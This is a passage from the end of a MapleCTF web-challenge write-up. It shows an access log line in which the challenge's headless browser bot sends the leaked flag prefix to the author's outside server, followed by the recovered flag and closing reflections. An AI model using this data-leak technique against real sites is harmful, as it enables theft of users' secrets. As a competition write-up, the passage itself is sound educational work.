35.203.147.181 - - [01/Oct/2023:21:57:03 +0000] "GET /map/YES/tooattachedforgottolookforunintendeds%7D?0.3308756734724301 HTTP/1.1" 404 512 "https://bawolff.net/maple3.htm?url=https%3A%2F%2Fjujutsu-kaisen-2.ctf.maplebacon.org%2Fnewchar%3Fguess%3D&prefix=tooattachedforgottolookforuninten" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36"

Thus the flag is maple{tooattachedforgottolookforunintendeds}

Conclusion

I spent a lot of time working on this problem and did not solve it until fairly close to the end of the competition. As the hours went by I knew I was making progress, but I was also really worried I would not figure it out in time. Luckily I got there with about two hours to spare.
 
It was quite a fun problem, and it taught me a lot about web browsers. I now have some truly useless knowledge about how <object> tags work in chrome, and some somewhat more useful knowledge about ServiceWorkers, which is a really cool javascript API I wasn't very familiar with previously.

Thank you to the event organizers Maple Bacon for providing a great event.

addendum: This write-up came in the top 5 of the MapleCTF write-up competition. I've never placed in the top 5 of a write-up competition before; just wanted to say thank you to everyone :)